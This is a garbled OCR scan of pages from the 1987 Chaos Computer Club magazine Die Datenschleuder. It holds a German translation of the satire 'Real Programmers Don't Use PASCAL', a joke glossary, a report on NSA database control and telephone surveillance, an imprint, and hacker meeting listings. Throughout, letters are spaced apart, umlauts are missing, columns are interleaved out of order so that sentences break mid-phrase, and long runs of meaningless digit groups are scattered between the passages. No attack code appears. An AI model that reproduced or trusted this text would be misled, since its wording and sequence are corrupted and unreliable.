D e r e i n f a c h s t e W e g , u m z u b e s t i m m e n , w e r die Richtigen P r o g r a m m i e r e r sind, g e h t b e r d i e P r o g r a m m i e r s p r a c h e , die sie v e r w e n d e n . Richtige P r o g r a m mierer v e r w e n d e n F O R T R A N . Mslifresser v e r w e n d e n P a s c a l . N i c k l a u s W l r t h , d e r Erfinder v o n P a s c a l , w u r d e e i n m a l gefragt "Wie s p r e c h e n S i e I h r e n N a m e n aus?". " Y o u c a n e i t h e r call m e by n a m e , p r o n o u n c i n g it 'Veert', or call m e by value, 'Worth'", s a g t e er. M a n k a n n a u s dieser Antwort u n m i t t e l b a r e r s e h e n , d a N i c k l a u s W i r t h e i n M s l i f r e s s e r ist. D i e e i n z i g e F o r m d e r W e r t e b e r g a b e , die ein Richtiger P r o g r a m m i e r e r g u t h e i t , ist c a l l - b y - v a l u e - r e t u r n , w i e e s in d e n I B M / 3 7 0 F O R T R A N G - u n d H C o m p i l e r n i m p l e m e n t i e r t ist. Richtige P r o grammierer haben keine abstrakten Konzepte ntig, u m ihre A r b e i t z u e r l e d i g e n ; sie s i n d v o l l k o m m e n glcklich mit e i n e r L o c h k a r t e n stanze, einem F O R T R A N IV-Compiler und e i n e m Bier. Richtige P r o g r a m m i e r e r p r o g r a m mieren Listenverwaltunq, Stringmanipulation, B u c h f h r u n g (falls sie e s b e r h a u p t m a c h e n ) u n d Knstliche Intelligenz in F O R T R A N . W e n n D u e s nicht in F O R T R A N m a c h e n k a n n s t , m a c h e s in A s s e m b l e r . W e n n D u e s nicht in A s s e m b l e r m a c h e n k a n n s t , ist e s nicht wert, gemacht zu werden. A k a d e m i s c h e I n f o r m a t i k e r sind in d e n letzten J a h r e n z u n e h m e n d d e m strukturierten P r o g r a m m i e r e n verfallen. Sie sagen, d a Prog r a m m e viel e i n f a c h e r z u v e r s t e h e n sind, w e n n m a n spezielle Techniken und Sprachkonstruktionen b e n u t z t . W e l c h e K o n s t r u k t i o n e n g e n a u , d a r b e r sind s i e sich nicht g a n z einig, u n d die B e i s p i e l e , die sie b r i n g e n , u m ihre A n s i c h t e n zu b e l e g e n , p a s s e n i m m e r auf jeweils e i n e S e i t e i r g e n d e i n e r o b s k u r e n Z e i t schrift. Als ich mit d e r S c h u l e fertig w a r , d a c h t e ich, d a ich d e r b e s t e P r o g r a m m i e r e r d e r W e l t bin. Ich k o n n t e ein u n s c h l a g b a r e s T i c - T a c T o e - P r o g r a m m s c h r e i b e n , fnf v e r s c h i e d e n e Programmiersprachen v e r w e n d e n und 1 0 0 0 Z e i l e n l a n g e P r o g r a m m e a b f a s s e n , die funktionierten. D a n n g e r i e t ich ins Richtige L e b e n h i n a u s . M e i n e e r s t e A u f g a b e w a r , ein 2 0 0 . 0 0 0 Zeilen langes F O R T R A N - P r o g r a m m zu lesen und zu verstehen, um es anschlieend um e i n e n Faktor z w e i z u b e s c h l e u n i g e n . J e d e r Richtige P r o g r a m m i e r e r wird dir s a g e n , d a kein strukturierter C o d e d e r W e l t dir d a b e i helf e n wird, ein P r o b l e m w i e d a s z u l s e n - d a z u b r a u c h t m a n wirkliches T a l e n t . Einige A n m e r k u n g e n z u Richtigen P r o g r a m m i e r e r n u n d strukturierter P r o g r a m m i e r u n g :

- R i c h t i g e P r o g r a m m i e r e r h a b e n k e i n e Angst, G O T O ' s zu verwenden; - R i c h t i g e P r o g r a m m i e r e r k n n e n fnf S e i t e n lange DO-Schleifen schreiben ohne nervs zu werden; - R i c h t i g e P r o g r a m m i e r e r lieben a r i t h m e t i s c h e I F - S t a t e m e n t s , weil sie d e n C o d e i n t e r e s s a n t e r machen; -Richtige Programmierer schreiben selbstmod i f i z i e r e n d e n C o d e , speziell w e n n sich d a d u r c h 2 0 N a n o s e k u n d e n im I n n e r e n e i n e r e n g e n Schleife einsparen lassen; -Richtige Programmierer brauchen keine Komm e n t i e r u n g e n : D e r C o d e spricht fr sich; - D a F O R T R A N k e i n e strukturierten IF, R E P E A T . . . U N T I L oder C A S E S t a t e m e n t s k e n n t , braucht e i n e n R i c h t i g e n P r o g r a m m i e r e r nicht z u s o r g e n . N e b e n b e i , m a n k a n n sie ntigenfalls s i m u l i e r e n d u r c h z u g e wiesene GOTO's. "Datenstrukturen" g e h e n seit k u r z e r Zeit a u c h durch die P r e s s e . A b s t r a k t e D a t e n t y p e n . S t r u k turen, Pointer, Listen u n d Strings sind in b e s t i m m t e n K r e i s e n p o p u l r g e w o r d e n . Wirth, d e r M s l i f r e s s e r , hat ein g a n z e s B u c h g e s c h r i e b e n ('Algorithms + D a t a S t r u c t u r e s = P r o g r a m m s ' , P r e n t i c e Hall, 1 9 7 6 ) , d a s b e h a u p t e t , m a n k n n e P r o g r a m m e b a s i e r e n d auf "Datenstrukturen" schreiben, anstatt die a n d e r e n W e g e z u ben u t z e n . W i e j e d e r Richtige P r o g r a m m i e r e r w e i , ist d e r e i n z i g e ntzliche D a t e n t y p d e r Array. Strings, Listen, S t r u k t u r e n u n d M e n g e n sind alles s p e z i e l l e F l l e v o n A r r a y s u n d k n n e n als s o l c h e b e h a n d e l t w e r d e n , o h n e e i n e m d i e Programmiersprache zu komplizieren. Das Schrecklichste an den wunderlichen Datentyp e n ist, d a m a n sie d e k l a r i e r e n m u ; R i c h t i g e n P r o g r a m m i e r s p r a c h e n implizit ist - w i e wir alle w i s s e n - e i n e S c h r e i b w e i s e , d i e auf d e m e r s t e n Buchstaben des sechs Zeichen langen Variab l e n n a m e n s basiert. W a s fr eine Art B e t r i e b s s y s t e m v e r w e n d e t ein Richtiger P r o g r a m m i e r e r ? C P / M ? Gott b e h t e . I m G r u n d e ist d a s e i n S p i e l z e u g - B e t r i e b s s y s t e m . A u c h k l e i n e ltere D a m e n u n d O b e r schler knnen C P / M b e n u t z e n und verstehen. Unix ist selbstverstndlich e i n w e n i g komplizierter - d e r typische U n i x - H a c k e r w e i nie, w i e d e r P R I N T - B e f e h l d i e s e W o c h e heit - a b e r w e n n ' s um die W u r s t g e h t , ist Unix ein herrlic h e s V i d e o s p i e l . D i e L e u t e m a c h e n nichts s e rises auf Unix-Systemen: sie schicken S c h e r z c h e n via U S E N E T u m die E r d e o d e r schreiben Adventure Games und Forschungsberichte.

33905 72492 25316 64413 84504 49248 72531 61928 23820 20249 25267 93149 68370 30300

53570 57386 66345 70331 07244 51232 93363 21711 31981 83245 06046 21379 37302 1 7205

16365 20691 4665a 39367 32333 63269 42336 15028 49309 68494 23445 59271 20047 93553

31205 74036 35972 21185 55360 95146 39046 28016 63695 1 2738 05492 30019 53143 05207

26495 95213 86659 69553 631 06 03596 32136 04483 96735 60566 27581 40963 33131 00706

61435 53373 451 13 95210 30696 03729 71011 05330 83274 49135 15170 86698 09270 07223

Real Programmers Don't Use PASCAL


.Fliegt Im G o l d e n e n Z e i t a l t e r d e s C o m p u t e r n s w a r e s e i n f a c h , die M n n e r ( b i s w e i l e n richtige M n ner' g e n a n n t ) v o n d e n Bubis ( b i s w e i l e n ' M s lifresser' g e n a n n t ) z u u n t e r s c h e i d e n . Z u d i e s e r Z e i t w a r e n d i e R i c h t i g e n M n n e r die, die e t w a s v o m P r o g r a m m i e r e n v e r s t a n d e n u n d die M s lifresser die, die nichts k a p i e r t e n . Ein R i c h t i g e r Computerprogrammierer sagte S a c h e n wie: " D 0 1 0 1 = 1 , 1 0 " und: " A B E N D , " und der Rest d e r W e l t s a g t e : " C o m p u t e r s i n d mir z u kompliziert" und: "Ich h a b e k e i n e B E Z I E H U N G z u C o m p u t e r n - sie sind so unpersnlich". Ein v o r a u s s c h a u e n d e s W e r k , B . F e i r s t e i n ' s "Richtige M n ner e s s e n k e i n Msli", ein T a s c h e n b u c h a u s d e m J a h r e 1 9 8 2 , w i e s d a r a u f hin, d a R i c h t i g e M n n e r sich auf nichts b e z i e h e n u n d a u e r d e m keine Angst davor h a b e n , unpersnlich zu sein.
A b e r die Z e i t e n n d e r n sich. H e u t e s e h e n wir e i n e W e l t , in d e r k l e i n e ltere D a m e n e i n e n computerisierten Mikrowellenherd haben, z w l f j h r i g e Kids e i n e n R i c h t i g e n M a n n bei Asteroids o d e r P a c M a n s p i e l e n d in die T a s c h e s t e c k e n , und j e d e r m a n n s e i n e n h c h s t p e r snlichen P e r s o n a l C o m p u t e r k a u f e n u n d v e r stehen kann. DerRichtigeProgrammiererdroht v o n S t u d e n t e n mit T R A S H - 8 0 e r n d e k l a s s i e r t z u werden! Es gibt, w i e a u c h i m m e r , U n t e r s c h i e d e z w i schen d e m typischen jugendlichen P a c M a n S p i e l e r u n d e i n e m Richtigen P r o g r a m m i e r e r . Diese Unterschiede zu begreifen, knnte den Kids e i n e P e r s p e k t i v e g e b e n - e i n P e r s n l i c h keitsbild, e i n e V a t e r f i g u r . A u e r d e m w r d e e s deutlich m a c h e n , d a w e i t e r h i n Richtige P r o grammierer gebraucht werden.

>atendjCewber

Nein, der Richtige

Programmierer

verwendet

O S / 3 7 0 . Ein guter P r o g r a m m i e r e r k a n n die B e schreibung eines IJK305l-error, d e r g r a d e aufg e t r e t e n ist, in s e i n e m J L C - H a n d b u c h und verstehen. Der groartige buch z u w e r f e n . Ein wirklich finden Programmierer auergewhnlisind,

k a n n J C L s c h r e i b e n o h n e e i n e n Blick ins H a n d c h e r P r o g r a m m i e r e r k a n n B u g s f i n d e n , d i e in sechs M e g a b y t e C o r e D u m p v e r g r a b e n ohne auch nur e i n e n H e x Taschenrechner zu benutzen. O S / 3 7 0 ist e i n w a h r h a f t b e m e r k e n s w e r t e s triebssystem. Es ermglicht die Be-

zulesen. Die Moral dieser Geschichte: Obwohl ein Richtiger Programmierer ntzlicherweise e i n e L o c h k a r t e n s t a n z e und e i n e n Printer z u s e i n e m W e r k z e u g z h l t , k a n n e r im Notfall mit einer Schalttafel und einem Telefon auskommen.

Elnge der K o n z e p t e dieser X e r o x Editoren sind in E d i t o r e n a u f g e n o m m e n w o r d e n , d i e a u f B e triebssystemen mit e t w a s v e r n n f t i g e r e n Bez e i c h n u n g e n w i e e t w a E M A C S o d e r VI laufen. D a s P r o b l e m m i t d i e s e n E d i t o r e n ist, d a R i c h t i g e P r o g r a m m i e r e r m e i n e n , ' w h a t y o u s e e is w h a t y o u get' sei ein s c h l e c h t e s K o n z e p t fr T e x t E d i t o r e n . D e r R i c h t i g e P r o g r a m m i e r e r will

mit n e g a t i v e n V o r z e i c h e n z u m o d i f i z i e r e n . -Source teikasten Code-Pflegesysteme. verschlossen, Ein

Das

S c h l i m m s t e : B o u n d s C h e c k i n g ist i n e f f i z i e n t . Richtiger davon P r o g r a m m i e r e r h l t s e i n e n C o d e in e i n e m K a r d e n n er geht a u s , d a der Eigentmer seine wichtigen Prog r a m m e nicht u n b e w a c h t z u r c k l a s s e n k a n n . 20247 15153 73927 067 1 h 19695 14939 76171 57365 73108 01893 757 1 1 34162 34387 6371 9 1939 i 7 1055 23343 8760 h 2 - 8 5 5 j j 8 j 44662 37092 32 143 1762 1 0 7 2 2 2 001 11 23235 26360 38223 53499 84634 34998 81994 24341 1 SB^ 038 16 88166 52137 74366 36565 53901 696 1 1 62725 26463 1 663 1 2681 1 58331 29353 35184 00905 41833 47173 139 43 02505 5353B 09671 40097 53103 73151 22836 04451 o19201 25477 56635 6h42 1 cn 31663 17100 33096 25406 59528 38731 03459 35100 70427 25776 96262 72773 71950 76400

ao POST t
^ L ^ ^ Tomteboda prk 2

B
B
das Edieren von

e i n e n ' y o u a s k e d f o r it, y o u g o t i t ' - E d i t o r ; e i n e n , der sein. Man hat festgestellt, da eine TECOdurch mit kompliziert, kryptisch, mchtig, unnachs i c h t i g u n d g e f h r l i c h ist. T E C O , u m g e n a u z u

Vernichtung beim

der Arbeit v o n einigen T a g e n d u r c h e i n e n einz i g e n f a l s c h g e s e t z t e n B l a n k , a l s o ist e s Programmieren angesagt, a u f g e w e c k t z u sein. D i e b e s t e Art, a n d a s S y s t e m r a n z u g e h e n , ist ber eine Lochkartenstanze. Einige L e u t e behaupten, es g b e ein Timesharing S y s t e m , das auf O S / 3 7 0 l u f t , a b e r n a c h s o r g f l t i g e n d i e n bin ich z u d e r A n s i c h t g e l a n g t , d a unrecht haben. W a s fr T o o l s b e n u t z t d e r R i c h t i g e mierer? Theoretisch kann ein ProgramProStusie

trans
42-44

42 GTEBORG BAN

Kommandofolge Text. Eines

eher an Zeichensalat

b e r t r a g u n g s r a u s c h e n erinnert als an l e s b a r e n der unterhaltsamsten Spiele T E C O besteht darin, d a m a n seinen Namen

als K o m m a n d o z e i l e eintippt u n d V e r m u t u n g e n d a r b e r anstellt, w a s d a d u r c h passiert. S o gut wie jeder mgliche Tippfehler bei der K o m m u nikation mit T E C O w i r d k u r z e r h a n d d e i n und mysterise B u g s in S u b r o u t i n e n Prog r a m m z e r s t r e n , o d e r s c h l i m m e r noch, subtile schleus e n , die einst funktioniert h a b e n . In e i n i g e n Firmen besteht P r o g r a m m t e x t nicht l n g e r darin, d a z e h n Ingenieure Schlange stehen, um eine 0 2 9 L o c h k a r t e n s t a n z e z u b e n u t z e n . T a t s c h l i c h ist e s s o , d a in d e m G e b u d e , in d e m i c h a r b e i t e , keine einzige Lochkartenstanze steht. Der R i c h t i g e P r o g r a m m i e r e r h a t in d i e s e r S i t u a t i o n s e i n e Arbeit mit e i n e m T e x t Editor-Programm denen ausz u m a c h e n . Die m e i s t e n S y s t e m e sind mit verschiedenen Editoren ausgestattet, aus m a n whlen kann, und der Richtige ProgramAus diesem Grund ein widerstrebt Programm es zu Richtigen edieren,

51382 87521 39 038 9 4 493

Die Ratenschleuder Ultravollstndiges maximegalonischstes Wrterbuch aller Zeiten (zweite Rate)


BASF: Byte-Abweisende BIMoMAT: BrolndustrlalisierungsMaschine MAThecoprozessor. mSdOS-fhiger trottel. FOXTrottel: FernOst-XT. B I M o M A T ab 2/3-kompatibel. FOXtrottel de Luxe: L e i s t u n g s f h i g e r T r o t t e l bis z u r 8 0 9 8 6 - K l a s s e . GIPS: Gigalnstruktionen Pro S e k u n d e . 1000 M I P S 1 GIPS. GRIPS: Nachweislich undefinierbare Maeinheit. LOGOMAT: LOGischer AutoMAT. Neudeutsches Kunst= Kleinrechner vom Typ FOXohne SchutzFolie.

Richtiger

g r a m m i e r e r s e i n e P r o g r a m m e z u m L a u f e n bring e n , i n d e m e r s i e d i r e k t b e r d i e S c h a l t t a f e l in d e n C o m p u t e r eingibt. In d e n f r h e n T a g e n , als die C o m p u t e r n o c h Schalttafeln hatten, w u r d e das gelegentlich so gemacht. hat Der typische gesamten Programm Richtige Programmlerer den

Programmierern,

d a s k u r z d a v o r s t e h t , z u f u n k t i o n i e r e n . S i e find e n es viel e i n f a c h e r , d e n b i n r e n O b j e k t c o d e direkt zu patchen, i n d e m sie ein w u n d e r b a r e s Programm benutzen, das SUPERZAP (oder d a s e n t s p r e c h e n d e quivalent auf nicht-IBMM a s c h i n e n ) heit. D a s funktioniert s o gut, d a viele P r o g r a m m e , die aut I B M - S y s t e m e n fen, keinerlei Verwandtschaft mehr mit original F O R T R A N - C o d e h a b e n . In e i n e r laudem An-

B o o t s t r a p L o a d e r in H e x i m G e d c h t n i s u n d g i b t ihn n e u e i n , w e n n e r v o n s e i n e m z e r s t r t w o r d e n Ist. In d i e s e r Z e i t w a r S p e i c h e r n o c h S p e i c h e r - er v e r s c h w a n d nicht, w e n n d e r Strom w e g war. Heutzutage vergit der Speic h e r D i n g e , a u c h w e n n d u e s nicht w i l l s t , o d e r er behlt Dinge, die er lngst htte v e r g e s s e n sollen. Die Legende sagt, da Seymour Cray, der der Gesie Erfinder des C r a y I S u p e r c o m p u t e r s und triebssystem fr die C D C 7 6 0 0 aus dem als

mierer m u a c h t g e b e n , d a er sich d e n Viele L e u t e g l a u b e n , d a die b e s t e n zur Verwendung auf Altosund

s u c h t , d e r s e i n e m p e r s n l i c h e n Stil e n t s p r i c h t . Editoren DoradoUnglckliBetriebssyer Mitteilunder W e l t im X e r o x P a l o Alto R e s e a r c h C e n t e r , Computern geschrieben werden.

z a h l v o n F l l e n ist d e r S o u r c e C o d e n i c h t l n g e r v e r f g b a r . W e n n e s a n d e r Z e i t ist, e i n d e r a r tiges P r o g r a m m zu fixieren, wird kein M a n a g e r jemand geringeren als e i n e n Richtigen Prog r a m m i e r e r mit d e m J o b b e t r a u e n - k e i n m s lifressender strukturierter P r o g r a m m i e r e r wrde wissen w o anfangen. Das beitsplatzsicherung. Einige P r o g r a m m i e r - T o o l s , die nicht v o n Richtigen Programmierern benutzt werden: nennt m a n Ar-

meisten Control-Data-Computer, das erste Bedchtnis ber die Schalttafel eingab, selbstverstndlich rer. ein Richtiger

cherweise wird kein Richtiger stem benutzen,

Programmierer

j e m a l s e i n e n C o m p u t e r mit e i n e m

das SmallTalk heit, und machen. 99635 37526 631 14 19370 45933 90346 69 753 66295 71862 45903 42215 39005 77735 20956 54590 44115 13 11 a 29395 32601 71241 45454 80574 9J572 18009

z u m e r s t e n M a l h o c h g e f a h r e n w u r d e . C r a y ist Programmie-

wird d e m C o m p u t e r b e s t i m m t k e i n e g e n mit e i n e r M a u s
39994

Einer meiner Lieblings-Richtige-Programmierer war Systemprogrammierer bei Texas Instruments. Eines Tages erreichte ihn ein Ferngesprch von einem User, dessen System mitten in einer wichtigen Arbeit zusammengebrochen war. Jim behob den Schaden ber das Telefon, indem erden User da zu brachte, Disk l/O-lnstruktionen ber die Schalttafel einzugeben, nach seinen Anweisungen System Tables in Hex zu reparieren und Registerinhalte aus-

90271 534 7 26358 51219 35437 00294 13387 02732 32220 45026 "II

63990 96285 13290 98979 28117

57131 06114 82599

15870 65148 43976 ! 1 u 8 j 7 0 9 3 4 16488 05669

-FORTRAN-Prprozessoren und R A T F O R . Derartige sind gut z u m -Source Language Mslimachen;

wie

MORTRAN

Programmierrezepte Richtige lesen; Pro-

65s20 62734 63104 5334 1 6 4 3 2 41149 31699 4 3739 35369 39132 39552 74175 3842S 205 49230 5.335 2I4A4 7 352? 52402

Debugger.

grammierer knnen Core Dumps

- C o m p i l e r mit Array B o u n d s C h e c k i n g . S i e ersticken die Kreativitt, vernichten die m e i s t e n

wort fr C o m p u t e r .

der interessanten Ver

mSdOS:

92246
6:233

wendungsweisen

fr EOUIVALENCE
c i j l e u b e r

und ma-

meinem System droht Overkill Status.


Betriebskrankheit gefhrdeter Seelen.

chen es unmglich, den Betriebssystemcode


e D a t e n

> a i e n # c f f t e v t b e r

IMPRESSUM Die Datenschleuder Numero 20 Das wissenschaftliche Fachblatt fr Datenreisende D-2000 Hamburg 20 Schwenckestrasse 85 Geonet: Geo1:Chaos-Team Btx : 655321 Herausgeber und ViSdPG: Herwart HollandMoritz Mitarbeiter (u.a.): R. Schrutzki, S. Wernery, A. Eichler, P. Franck, H. Gruel, M. Kuehn, Esco, Andy M.-M., S. Stahl, padeluun, KS, jwl, Dietmar Wintschnig, Poetronic Vierfarb-Termindruck im Selbstverlag. April 1987
31215 55769 55021 21013 47294 94298 i4489 27870 48886 31147 36172 73580 33186 Afi59? 22236 54950 41374 9962a 72915 48075 94813 64636 02708 41061 56948 60335 60836 78517 35755 53923 34445 99193 10396 79551 84038 50356 61710 544 19 36918 78195 49663 77.33? Robert L. Park der " A m e r i c a n Physical S o c i e t y " bem e r k t e : " B e h r d e n , die d a r a u f (die D i r e k t i v e , A n m . d. Red.) zurckgreifen w o l l e n , werden sie auf alles anwenden, das sie verbergen w o l l e n " , d a r u n t e r auch Forschungsberichte. Park wies auerdem d a r a u f h i n , da j e d e r Bericht, der von einer Behrde finanziert w i r d , somit als " e m p f i n d l i c h " eingestuft u n d unter K o n t r o l l e gestellt werden kann. Diese E n t w i c k l u n g ist sicherlich auch vor dem H i n t e r g r u n d des zunehmenden Einsatzes von T e l e k o m m u n i k a t i o n d u r c h " r a d i k a l e " Bewegungen in den U S A zu.sehen. Seinerzeit w u r d e n die bundesweiten Protestaktionen gegen die Investitionen amerikanischer Universitten auch m i t der H i l f e eines elektronischen Konferenzsystems k o o r d i n i e r t . Die N S A ist in letzter Zeit mehrfalls aufgefallen. D i e Bayerische Hackerpost hatte am 14.12.86 v o n einem A r t i k e l i n der E G - Zeitschrift " I n f o r m a t i o n M a r k e t " berichtet, demzufolge vertrauliche I n f o r m a t i o n e n europischer F i r m e n an k o n k u r r i e r e n d e U S - F i r m e n von berwachungszentren der US-Streitkrfte weitergeleitet werden. Der Verfasser, ein frherer M i t a r beiter der U S - L u f t w a f f e , behauptet, da dieser T e i l der b e r w a c h u n g der T e l e k o m m u n i k a t i o n s bei weitem das A b h r e n des sowjetischen M i l i t r f u n k v e r kehrs berwiege. " D i e wichtigste Station f r die gegenseitige Sicherheit in der W e l t " , so ein frherer D i r e k t o r der US N a tional Security Agency N S A , liege i n M e n w i t h H i l l i n der Grafschaft Yorkshire i m N o r d e n Englands. D o r t laufen einige 10.000 T e l e f o n l e i t u n g e n zu der nahegelegenen Relaisstation der britischen Telefongeselschaft British Telecom. M e n w i t h H i l l werde auerdem d u r c h einen H o h l l e i t e r versorgt, der bereits v o r seiner M o d e r n i s i e r u n g v o r zwei Jahren eine K a p a z i tt von 32.000 Telefongesprchen gleichzeitig hatte. Die N S A ist auch f r die b e r w a c h u n g smtlicher internationale U S Telefon- u n d D a t e n l e i t u n g e n , auch mittels computeruntersttzter S t i c h p r o b e n p r f u n g , zustndig. bersetzung: T T
BEREICH COMPOST USA

Mega-Control

U S - B e h r d e w i l l alle ffentlichen Datenbanken kont r o l l i e r e n u n d zensieren I n der US-Zeitschrift " C h r o n i c a l o f Higher Educat i o n " w u r d e 21. Januar berichtet, da der President der U S A eine D i r e k t i v e ( N a t i o n a l Security Directive 145) erlassen h a t , m i t der die Nationale Sicherheitsb e h r d e N S A d i e Befugnis erteilt w i r d , f f e n t l i c h zug n g l i c h e D a t e n b a n k e n zu kontrollieren u n d zu zensieren, o h n e v o r h e r d i e Z u s t i m m u n g des jeweiligen A u t o r s eines D a t e n b a n k d o k u m e n t s einholen zu mssen. D a t e n b a n k e n s i n d elektronische Informationssysteme, die f r spezielle T h e m e n oder Wirtschaftsb r a n c h e n D o k u m e n t e u n d Literaturverzeichnisse per C o m p u t e r zur V e r f g u n g stellen. D i e A u t o r i n des A r t i k e l s , J u d i t h A x l e r T u r n e r , weist d a r a u f h i n , da die U S - R e g i e r u n g ein neues B r o der N S A eingerichtet hat, das f r die Sicherheit A L L E R C o m p u t e r s y s t e m e zustndig sein w i r d , " d i e e m p f i n d l i c h e I n f o r m a t i o n e n speichern k n n t e n - u n a b h n g i g d a v o n , ob sie v o n Regierungsbehrden gespeichert w e r d e n , der G e h e i m h a l t u n g s p f l i c h t unterliegen o d e r der n a t i o n a l e n Sicherheit u n m i t t e l b a r b e r h r e n " . Dies schliesst auch solche k o m m e r z i e l l e Systeme m i t ein w i e D i a l o g , N e x i s , Lexist, u.a. F r a u T u r n e r z i t i e r t , unter anderen, Frau D i a n e Fountaine, L e i t e r i n der A b t e i l u n g Informationssysteme i m B r o des stellvertretenden Verteidigungssekretr, die fr Kommunikation, Kommandoslruktur, Kontrolle u n d N a c h r i c h t e n d i e n s t e zustndig ist: " D i e Frage i n den 80er J a h r e n ist n i c h t : " W i r d es Einschrnkungen oder. K o n t r o l l e bei der Benutzung k o m m e r z i e l l zug n g l i c h e r D a t e n b a n k e n s e i n " : die Frage ist vielm e h r : " W i e w e r d e n solche Einschrnkungen u n d Kontrollen angewandt?".

62470 77312 06012 26525 73162 53673 79934 97525 51993 68607 91739 17745 65.368 31072 45386 41:87 55384 29666 368 4 1 30194 18433 81041 19700 279.34 04885 7932 3

51945 02315 85258 52137 261 13 23106 34210 06246 92993 82099 24071 2751 3 66855 23346 37 196 38527 56246 36764 40814 77383 64959 90448 22601 33263 23972 72453

05041 38684 05659 00806 7231 7 09792 6878 1 95861 99556 01260 94599 13633 51646 7261 1 23585 72292 319101 45137 43873 02046 1 9508 04724 31043 43799 91765 35720

98477 57072 47030 87520 39230 1599.3 34973 69091 75427 63137 63230 99822 77029 37054 631 26 25947 39057 24656 2957g 0324O 2c!o83 79492 006 2 4 5 9,', SS 93760 96075

420 1 4 90544 46836 09593 74623 60019 46959 78573 1 4654 04984 60254 84730 1 1336 90795 1 8387 43373 2 757 1 53730 4 7 3.4 8 60842 23206 91342 10717 31446 1 6 !i 7 8227 7

13394 05751 34459 45360 09468 94623 24646 97659 91045 17807 70790 86076 82756 36593 1 5677 73569 0 1 DJ 1 40244 49000 87535 5221 2 28495 9 7150 85323 31193 1 7343

IfkL
SMe

>atenci)teuber

SDie

3>aten

cfiTeuber

D M 3,00

Numero 21 - Juni 1987

riebss,ck

Postvertriebsstck

C9927f

Ste
Das wissenschaftliche Fachblatt fr Datenreisende
Ein Organ des Chaos Computer Club

O
336 16 74627 14076 30153 53334 90342 91668 26945 79822 88783 56729 99431 58951 90909 03031 37376 56054 08370 94813 86352 33640 03517 82003 8796 13416 39001 53649 70793 76045 53496 6211 82775 3771 5 9723 h 44805. 75424 06173 63394 15452 1 3060 67872 42772 65117 36S22 41878 00445 16217 07134 63356 44601 13582 61289 67137 79448 11931 12595 33642 63076 62325 27057 59566 23297 25894 45689 28730 51650 76806 53665 35621 87756 1 7000 71709 81904 82649 24910 4571 1 52312 08550 37083 87429 26184 97739 44279 72615 42632 09054 14760 50129 3 6 57 0 62261 75867 85126 79854 20053 57824 46559 1 7206 064 1 9 62695 j 3 21 j 26507 74371 03070 36984 1 8 1 29 53657 5 5 7 59 43385 03983 88735 9265a 74735 10973 82654 94294 45592 5 4 4 96 73457 76171 23949 02925 45476 41788 43452 47820 41803 53846 31946 22662 77696 56602 41603 12317 38631 79452 55142 63236 47756 40634 4 9 157 9 4382 21952 61635 423 1 1 39446 1 5627 32379 33994 40792 739 15 1 3 9 23 40996 36262 8 3 4 38 33706 1 0725 73 196 20404 334:5 65770 43494 06 295 ; i 39 3097 7 i!42i 5 1 7 8 0 0 0 2 1 7 19034 6 1 4 5 6 004 3 3 7 3 9 3 9 04264 81347 39892 29340 40526 49432 91225 64339 35696 3 4 252 6 6 3 4 7 2 5 9 4 9 32436 3 2 7 4 6 1 8420 1 0 4 6 6 2 5 9 3 9 014 17 : i n 1 9 S01 25 7 i s g 4401 3 39762 20967 4 6 4 3 7 <54699 0 1 6 2 6 1 4053 94094 63952 07051 16368 25194 27648 41416 05372 5 401 9 6 8 3 2 5 32893 7 1427 313 4 8 20163 86059 00307 27093 90378 1 4 39 6 1 9665 6394 1 17163 60474 06637 97295 09 154 11350 354 10 2 5329 224 16 50902 3 5 7 4 2 42522 6'7390 1 3030 69925 1 9959 0 4 3 d : 74 125 73422 44776 5534 1 72654 6 2 0 8 5 4 9 8 2 9 4 4 9 3"? -5316 5 2 6 3 2 07 2 25 E 23 T 73:30 330-7 0 5 6 3 3 3 1 1 2 2 33434 35"2 1 3865 : : 7 0 7 4 3 S " 0 1 4 3 2 9! 2 559" 5 7 '.35 423-J3 23?n : ?3o43 3 3 :* 3354? 3 3c 4.3 c 60 7 -1 7 625 7 4 c" 3 0 42970 438 : 443 : 0704.* 3 ; ia'-' 3 i ' j Vi "M.itr.
- - ; ' -

63095 36393 99566 19555 07600 85236 56366 05574 337 a 6 3 4 0 2 38354 2425a 72234 07568 933 1 1 24935 199S1 79934 56926 534 1 9 59113 07474 20084 55091 70345 14273 45584 26792 20270 83121 50156 33764 17166 4 4 3 0 6 9 3 1 5 4 91993 21217 0 4 1 5 4 7 8 7 2 5 47205 505 14 7 7 1 3 7 9 3 9 9 1 94290 96137 6 2 1 1 0 7 2 3 8 4 37651 96231 25350 60685 20796 65683 71511 66042 78473 6 3 2 5 5 15772 9 0 7 0 9 5 7433 9 8 7 8 3 13649 19512 42673 7 1 4 5 9 0 9 1 0 6 484 16 74420 1 7536 22694 0 2159 41255 19296 76753 71413 47293 95552 24430 89071 36043 6073 1 9587 1 34069 4642 1 62272 1 9579 13179 23937 92696 63542 04039

43336 4:9:2 345.30 56506 5 9 : 12 64261 38454 2 31 2 2 427 1 6 96985 7118 4 39245 97003 40028 71391

49234 63335 1 5627 44261 55009 14314 46655 1 2 103 70753 49454 9335 1 67807 37701 06 184 09149 84644 27673 32930 20423 90769 343 1 4 34028 "7386 4673" 637 63 39305 674 1 9 TO D g ^

26426 55534 08609 44566 1 5430 2" 9 77 98533 44603 21756 1854B 60734 .>5457 18976 1 8529 665 3 4 83249 1 2753 455 1 3 42999 43166 956 4 5 42926 17 177 350=;; 4 5 " 01 30") 14 1 j 1 ; : o i 51 4 : s 14 -779"

"M '.97 -13 5 o 3 3 ' 1 co

73235 16613 3 3 0 3 8 00072 34403 84653 60259 21097 73558 1 4989 53238 90427 73925 7 9 0 1 3 10 7 6 4 0 70842 68927

1 4361 83629 93675 91079 37523 1 3629 08375 36072 37937 7 4 355 43743 1 1 29! " 0 2 4 5 43202 50254 4527 1 15064 22655 58976 001 4 34216 35527 43035 60421 22611 3337 77130

343h5

: '.-.!:

8 4 : 6q 16 3a 4 1 t>3 1 0 0 3 3 7 34503 3B?2 1 3 2 9 2 13 2=7 <>, L .. . " " 3 5 5 ' ^ Juij OSSi0. : d T 0 4 2 30 0 1"

36" c

ber D a t e n c f y l e u b e r

flb

&

fr

m poh to

Hacker-Meetings - Wichtige T e r m i n e 1987


Tel: eh immer besetzt Btx: n Mbx: Treffen: Montag 20 Uhr i m Kaffe Hardenberg, Hardenbergstr.10, Berlin 12, nhe Zoo. CCC-Rhein-Main ( D S - R E D Rhein-Main) C/o E.Engelter Postfach 1201 D-6073 Egelsbach Tel: 06103 4274 Btx: n M b x : IFX2:E.Engelter Treffen: n CAC Computer Artists Cologne e.V. Postfach 300308 D-5000 Kln 30 Tel: 0221-381418,0221-5503749 Btx: (17) *92016306,,

Editorial

